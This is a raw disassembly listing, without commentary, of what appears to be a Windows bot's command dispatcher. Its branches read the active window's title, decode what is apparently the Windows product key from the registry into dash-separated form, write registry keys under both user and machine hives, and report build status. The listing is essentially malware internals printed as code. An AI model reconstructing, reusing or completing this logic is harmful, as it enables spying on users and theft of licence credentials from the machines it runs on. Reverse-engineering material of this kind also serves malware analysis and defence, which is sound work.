locret_40A8AB: ; CODE XREF: sub_40A86D+15�j
leave
retn
sub_40A86D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A8AD proc near ; CODE XREF: sub_406509+26�p
; sub_40A9CF+193F�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push esi
push edi
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_20], 0
mov esi, offset aAbcdef ; "abcdef"
lea edi, [ebp+var_1C]
movsd
movsw
movsb
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 30h
jnz short loc_40A90C
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 78h
jz short loc_40A905
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 58h
jnz short loc_40A90C
loc_40A905: ; CODE XREF: sub_40A8AD+48�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_40A90C: ; CODE XREF: sub_40A8AD+33�j
; sub_40A8AD+56�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_20]
mov [ebp+var_14], eax
jmp short loc_40A927
; ---------------------------------------------------------------------------
loc_40A920: ; CODE XREF: sub_40A8AD+116�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_40A927: ; CODE XREF: sub_40A8AD+71�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_28]
jge loc_40A9C8
mov eax, [ebp+arg_0]
add eax, [ebp+var_14]
movsx eax, byte ptr [eax]
push eax
call sub_416DE4 ; tolower
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 30h
jl short loc_40A95D
cmp [ebp+var_8], 39h
jg short loc_40A95D
mov eax, [ebp+var_8]
sub eax, 30h
mov [ebp+var_10], eax
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A95D: ; CODE XREF: sub_40A8AD+9D�j
; sub_40A8AD+A3�j
cmp [ebp+var_8], 61h
jl short loc_40A99C
cmp [ebp+var_8], 66h
jg short loc_40A99C
and [ebp+var_24], 0
jmp short loc_40A976
; ---------------------------------------------------------------------------
loc_40A96F: ; CODE XREF: sub_40A8AD:loc_40A998�j
mov eax, [ebp+var_24]
inc eax
mov [ebp+var_24], eax
loc_40A976: ; CODE XREF: sub_40A8AD+C0�j
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
test eax, eax
jz short loc_40A99A
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
cmp [ebp+var_8], eax
jnz short loc_40A998
mov eax, [ebp+var_24]
add eax, 0Ah
mov [ebp+var_10], eax
loc_40A998: ; CODE XREF: sub_40A8AD+E0�j
jmp short loc_40A96F
; ---------------------------------------------------------------------------
loc_40A99A: ; CODE XREF: sub_40A8AD+D3�j
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A99C: ; CODE XREF: sub_40A8AD+B4�j
; sub_40A8AD+BA�j
xor eax, eax
jmp short loc_40A9CB
; ---------------------------------------------------------------------------
loc_40A9A0: ; CODE XREF: sub_40A8AD+AE�j
; sub_40A8AD:loc_40A99A�j
mov eax, [ebp+var_28]
sub eax, [ebp+var_14]
dec eax
push eax
push 10h
call sub_40A86D
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
imul eax, [ebp+var_10]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
jmp loc_40A920
; ---------------------------------------------------------------------------
loc_40A9C8: ; CODE XREF: sub_40A8AD+80�j
mov eax, [ebp+var_C]
loc_40A9CB: ; CODE XREF: sub_40A8AD+F1�j
pop edi
pop esi
leave
retn
sub_40A8AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9CF proc near ; CODE XREF: sub_40D871+C95�p
; sub_40D871+D9C�p
var_6424 = dword ptr -6424h
var_6420 = dword ptr -6420h
var_641C = dword ptr -641Ch
var_6418 = dword ptr -6418h
var_6414 = dword ptr -6414h
var_6410 = dword ptr -6410h
var_640C = dword ptr -640Ch
var_6408 = dword ptr -6408h
var_6404 = dword ptr -6404h
var_6400 = dword ptr -6400h
var_63FC = dword ptr -63FCh
var_63F8 = dword ptr -63F8h
var_63F4 = dword ptr -63F4h
var_63F0 = dword ptr -63F0h
var_63EC = dword ptr -63ECh
var_63E8 = dword ptr -63E8h
var_63E4 = dword ptr -63E4h
var_63E0 = dword ptr -63E0h
var_63DC = dword ptr -63DCh
var_63D8 = dword ptr -63D8h
var_63D4 = dword ptr -63D4h
var_63D0 = dword ptr -63D0h
var_63CC = dword ptr -63CCh
var_63C8 = dword ptr -63C8h
var_63C4 = dword ptr -63C4h
var_63C0 = dword ptr -63C0h
var_63BC = dword ptr -63BCh
var_63B8 = dword ptr -63B8h
var_63B4 = word ptr -63B4h
var_63B2 = word ptr -63B2h
var_63B0 = dword ptr -63B0h
var_63A4 = dword ptr -63A4h
var_63A0 = byte ptr -63A0h
var_639C = dword ptr -639Ch
var_6398 = byte ptr -6398h
var_6397 = byte ptr -6397h
var_6396 = byte ptr -6396h
var_6395 = byte ptr -6395h
var_6394 = byte ptr -6394h
var_6393 = byte ptr -6393h
var_6392 = byte ptr -6392h
var_6391 = byte ptr -6391h
var_6390 = byte ptr -6390h
var_638F = byte ptr -638Fh
var_638E = byte ptr -638Eh
var_638D = byte ptr -638Dh
var_638C = dword ptr -638Ch
var_6388 = byte ptr -6388h
var_5F84 = dword ptr -5F84h
var_5F80 = byte ptr -5F80h
var_5B7C = dword ptr -5B7Ch
var_5B78 = dword ptr -5B78h
var_5B74 = byte ptr -5B74h
var_5A70 = dword ptr -5A70h
var_5A6C = dword ptr -5A6Ch
var_5A68 = dword ptr -5A68h
var_5A64 = byte ptr -5A64h
var_1A64 = dword ptr -1A64h
var_1A60 = byte ptr -1A60h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_A38 = byte ptr -0A38h
var_A30 = dword ptr -0A30h
var_A2C = dword ptr -0A2Ch
var_A28 = dword ptr -0A28h
var_A24 = dword ptr -0A24h
var_A20 = dword ptr -0A20h
var_A1C = dword ptr -0A1Ch
var_A18 = byte ptr -0A18h
var_9F8 = dword ptr -9F8h
var_9F4 = byte ptr -9F4h
var_9EF = byte ptr -9EFh
var_9EA = byte ptr -9EAh
var_9E5 = byte ptr -9E5h
var_9E0 = byte ptr -9E0h
var_9DB = byte ptr -9DBh
var_9D8 = byte ptr -9D8h
var_9A4 = byte ptr -9A4h
var_970 = byte ptr -970h
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_8D3 = byte ptr -8D3h
var_8D2 = byte ptr -8D2h
var_8CD = byte ptr -8CDh
var_8CC = byte ptr -8CCh
var_8C7 = byte ptr -8C7h
var_8C6 = byte ptr -8C6h
var_8C1 = byte ptr -8C1h
var_8C0 = byte ptr -8C0h
var_8BB = byte ptr -8BBh
var_8B8 = byte ptr -8B8h
var_8A0 = byte ptr -8A0h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_718 = byte ptr -718h
var_59B = byte ptr -59Bh
var_598 = byte ptr -598h
var_418 = dword ptr -418h
var_414 = byte ptr -414h
var_214 = byte ptr -214h
var_1F0 = byte ptr -1F0h
var_1CC = byte ptr -1CCh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
var_183 = byte ptr -183h
var_83 = dword ptr -83h
var_7F = byte ptr -7Fh
var_19 = byte ptr -19h
var_B = byte ptr -0Bh
var_8 = byte ptr -8
var_5 = dword ptr -5
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 6424h
call sub_416BC0
push esi
push edi
mov eax, [ebp+arg_14]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_1A8], eax
push [ebp+arg_0]
lea eax, [ebp+var_1A4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_183]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+arg_C]
mov [ebp+var_83], eax
push 7Ah
push [ebp+arg_10]
lea eax, [ebp+var_7F]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov [ebp+var_5], 1
mov eax, [ebp+var_1A8]
sub eax, dword_419F18
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AA59
lea eax, [ebp+var_1A4]
push eax
call sub_415AF0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AA59: ; CODE XREF: sub_40A9CF+76�j
mov eax, [ebp+var_1A8]
sub eax, dword_419F0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AACF
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40AAAC
lea eax, [ebp+var_214]
push eax
lea eax, [ebp+var_1F0]
push eax
lea eax, [ebp+var_1CC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1CC]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AAAC: ; CODE XREF: sub_40A9CF+A6�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D7E5
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AACF: ; CODE XREF: sub_40A9CF+9D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419EF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB21
push 200h
lea eax, [ebp+var_414]
push eax
call dword_4171D8 ; GetForegroundWindow
push eax
call dword_4171E4 ; GetWindowTextA
test eax, eax
jle short loc_40AB1C
lea eax, [ebp+var_414]
push eax
push offset dword_419EDC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AB1C: ; CODE XREF: sub_40A9CF+130�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB21: ; CODE XREF: sub_40A9CF+113�j
mov eax, [ebp+var_1A8]
sub eax, dword_419ED0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB56
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4077DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB56: ; CODE XREF: sub_40A9CF+165�j
mov eax, [ebp+var_1A8]
sub eax, dword_419EC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AC89
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AC84
push 180h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_598]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 3
jle short loc_40ABFE
push offset dword_419EC0
mov eax, [ebp+var_418]
lea eax, [ebp+eax+var_59B]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40ABFE
mov eax, [ebp+var_418]
and [ebp+eax+var_59B], 0
lea eax, [ebp+var_598]
push eax
call sub_4078A0
pop ecx
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
loc_40ABFE: ; CODE XREF: sub_40A9CF+1E1�j
; sub_40A9CF+1FF�j
mov eax, [ebp+var_418]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_418]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AC1F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC1F: ; CODE XREF: sub_40A9CF+249�j
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF29
pop ecx
pop ecx
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF59
pop ecx
pop ecx
mov [ebp+var_418], eax
push [ebp+var_418]
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_598]
push eax
call sub_40EB4E
add esp, 0Ch
lea eax, [ebp+var_718]
push eax
push offset dword_419E9C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AC84: ; CODE XREF: sub_40A9CF+1A7�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC89: ; CODE XREF: sub_40A9CF+19A�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AD84
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
cmp eax, 3Dh
jnz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_71C], eax
mov eax, [ebp+var_71C]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_71C]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AD0C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD0C: ; CODE XREF: sub_40A9CF+336�j
lea eax, [ebp+var_8A0]
push eax
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_720]
and [ebp+eax+var_8A0], 0
lea eax, [ebp+var_8A0]
push eax
push offset dword_419E70
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AD7F: ; CODE XREF: sub_40A9CF+2DA�j
; sub_40A9CF+2EC�j ...
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD84: ; CODE XREF: sub_40A9CF+2CD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E60
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADB2
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406643
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADB2: ; CODE XREF: sub_40A9CF+3C8�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADD9
lea eax, [ebp+var_1A4]
push eax
call sub_4064BF
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADD9: ; CODE XREF: sub_40A9CF+3F6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E48
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B0B6
and [ebp+var_9F8], 0
mov [ebp+var_A1C], 0C8h
push 0Ch
pop ecx
mov esi, offset dword_419E14
lea edi, [ebp+var_9D8]
rep movsd
movsb
push 5
pop ecx
mov esi, offset dword_419DFC
lea edi, [ebp+var_8B8]
rep movsd
movsb
lea eax, [ebp+var_9D8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_9F8]
push eax
push 20019h
push 0
lea eax, [ebp+var_9D8]
push eax
push 80000002h
call dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_40AE7D
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AE78
push [ebp+var_9F8]
call dword_417028 ; RegCloseKey
loc_40AE78: ; CODE XREF: sub_40A9CF+49B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AE7D: ; CODE XREF: sub_40A9CF+485�j
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_8B8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_A1C]
push eax
lea eax, [ebp+var_9A4]
push eax
push 0
push 0
lea eax, [ebp+var_8B8]
push eax
push [ebp+var_9F8]
call dword_41700C ; RegQueryValueExA
test eax, eax
jz short loc_40AEE7
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AEE2
push [ebp+var_9F8]
call dword_417028 ; RegCloseKey
loc_40AEE2: ; CODE XREF: sub_40A9CF+505�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AEE7: ; CODE XREF: sub_40A9CF+4EF�j
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
push [ebp+var_9F8]
call dword_417028 ; RegCloseKey
push 7
pop ecx
mov esi, offset dword_419DDC
lea edi, [ebp+var_A18]
rep movsd
movsb
lea eax, [ebp+var_A18]
push eax
call sub_4105FB
pop ecx
and [ebp+var_9DB], 0
mov [ebp+var_8DC], 18h
jmp short loc_40AF3E
; ---------------------------------------------------------------------------
loc_40AF31: ; CODE XREF: sub_40A9CF+60B�j
mov eax, [ebp+var_8DC]
dec eax
mov [ebp+var_8DC], eax
loc_40AF3E: ; CODE XREF: sub_40A9CF+560�j
cmp [ebp+var_8DC], 0
jl loc_40AFDF
and [ebp+var_A20], 0
mov [ebp+var_A24], 0Eh
jmp short loc_40AF6B
; ---------------------------------------------------------------------------
loc_40AF5E: ; CODE XREF: sub_40A9CF+5EF�j
mov eax, [ebp+var_A24]
dec eax
mov [ebp+var_A24], eax
loc_40AF6B: ; CODE XREF: sub_40A9CF+58D�j
cmp [ebp+var_A24], 0
jl short loc_40AFC0
mov eax, [ebp+var_A20]
shl eax, 8
mov ecx, [ebp+var_A24]
movzx ecx, [ebp+ecx+var_970]
add eax, ecx
mov [ebp+var_A20], eax
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov ecx, [ebp+var_A24]
mov [ebp+ecx+var_970], al
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov [ebp+var_A20], edx
jmp short loc_40AF5E
; ---------------------------------------------------------------------------
loc_40AFC0: ; CODE XREF: sub_40A9CF+5A3�j
mov eax, [ebp+var_8DC]
mov ecx, [ebp+var_A20]
mov cl, [ebp+ecx+var_A18]
mov [ebp+eax+var_9F4], cl
jmp loc_40AF31
; ---------------------------------------------------------------------------
loc_40AFDF: ; CODE XREF: sub_40A9CF+576�j
lea eax, [ebp+var_A18]
push eax
call sub_4105AD
pop ecx
and [ebp+var_8BB], 0
mov [ebp+var_8C1], 2Dh
mov al, [ebp+var_8C1]
mov [ebp+var_8C7], al
mov al, [ebp+var_8C7]
mov [ebp+var_8CD], al
mov al, [ebp+var_8CD]
mov [ebp+var_8D3], al
push 5
lea eax, [ebp+var_9F4]
push eax
lea eax, [ebp+var_8D8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EF]
push eax
lea eax, [ebp+var_8D2]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EA]
push eax
lea eax, [ebp+var_8CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E5]
push eax
lea eax, [ebp+var_8C6]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E0]
push eax
lea eax, [ebp+var_8C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_8D8]
push eax
push offset dword_418B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B0B6: ; CODE XREF: sub_40A9CF+41D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DCC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B11C
mov [ebp+var_8], 1
movsx eax, [ebp+var_19]
test eax, eax
jz short loc_40B0E6
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0E6: ; CODE XREF: sub_40A9CF+706�j
movsx eax, [ebp+var_B]
test eax, eax
jz short loc_40B0FD
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0FD: ; CODE XREF: sub_40A9CF+71D�j
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
loc_40B117: ; CODE XREF: sub_40A9CF+715�j
; sub_40A9CF+72C�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B11C: ; CODE XREF: sub_40A9CF+6FA�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DBC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B143
lea eax, [ebp+var_1A4]
push eax
call sub_414EB0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B143: ; CODE XREF: sub_40A9CF+760�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DB0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B247
push 8
pop ecx
mov esi, offset dword_419D8C
lea edi, [ebp+var_A5C]
rep movsd
movsb
mov esi, offset dword_419D84
lea edi, [ebp+var_A38]
movsd
movsw
movsx eax, [ebp+var_A38]
mov ecx, off_41DAD8
movsx ecx, byte ptr [ecx]
sub eax, ecx
neg eax
sbb eax, eax
inc eax
mov [ebp+var_A30], eax
cmp [ebp+var_A30], 0
jz short loc_40B1AD
mov [ebp+var_63E4], offset dword_419D78
jmp short loc_40B1B7
; ---------------------------------------------------------------------------
loc_40B1AD: ; CODE XREF: sub_40A9CF+7D0�j
mov [ebp+var_63E4], offset dword_419D68
loc_40B1B7: ; CODE XREF: sub_40A9CF+7DC�j
mov eax, [ebp+var_63E4]
mov [ebp+var_A28], eax
cmp [ebp+var_A30], 0
jz short loc_40B1D8
mov [ebp+var_63E8], offset aThisBuildIsFul ; "This build is fully functional"
jmp short loc_40B1E2
; ---------------------------------------------------------------------------
loc_40B1D8: ; CODE XREF: sub_40A9CF+7FB�j
mov [ebp+var_63E8], offset aThisBuildIsBro ; "This build is broken and will not funct"...
loc_40B1E2: ; CODE XREF: sub_40A9CF+807�j
mov eax, [ebp+var_63E8]
mov [ebp+var_A2C], eax
lea eax, [ebp+var_A5C]
push eax
call sub_4105FB
pop ecx
push [ebp+var_A2C]
push [ebp+var_A28]
mov eax, dword_41ECC0
and eax, 0FFFFh
push eax
movsx eax, byte ptr dword_41DAB8
and eax, 0FFh
push eax
lea eax, [ebp+var_A5C]
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
lea eax, [ebp+var_A5C]
push eax
call sub_4105AD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B247: ; CODE XREF: sub_40A9CF+787�j
mov eax, [ebp+var_1A8]
sub eax, dword_419D08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B28E
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_405E45
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B28E: ; CODE XREF: sub_40A9CF+88B�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B2C5
mov eax, [ebp+arg_18]
add eax, 4
push eax
mov eax, [ebp+arg_14]
add eax, 4
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_4167DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B2C5: ; CODE XREF: sub_40A9CF+8D2�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CF0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B2EF
mov eax, [ebp+var_1A8]
sub eax, dword_419CE4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B300
loc_40B2EF: ; CODE XREF: sub_40A9CF+909�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D74D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B300: ; CODE XREF: sub_40A9CF+91E�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CD4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B335
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403260
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B335: ; CODE XREF: sub_40A9CF+944�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CC8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B36A
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40260D
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B36A: ; CODE XREF: sub_40A9CF+979�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3A5
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406509
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3A5: ; CODE XREF: sub_40A9CF+9AE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CA8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3DA
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_41665C
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3DA: ; CODE XREF: sub_40A9CF+9E9�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C98
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B426
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B3FD
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3FD: ; CODE XREF: sub_40A9CF+A27�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000002h
call sub_401000
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B426: ; CODE XREF: sub_40A9CF+A1E�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B44C
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_401146
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B44C: ; CODE XREF: sub_40A9CF+A6A�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B47D
push 0
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B47D: ; CODE XREF: sub_40A9CF+A90�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C70
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4AE
push 1
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4AE: ; CODE XREF: sub_40A9CF+AC1�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C64
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4D5
lea eax, [ebp+var_1A4]
push eax
call sub_409BF1
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4D5: ; CODE XREF: sub_40A9CF+AF2�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C5C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B508
push offset dword_41EFD8
push offset dword_419C4C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B508: ; CODE XREF: sub_40A9CF+B19�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C40
neg eax
sbb eax, eax
inc eax
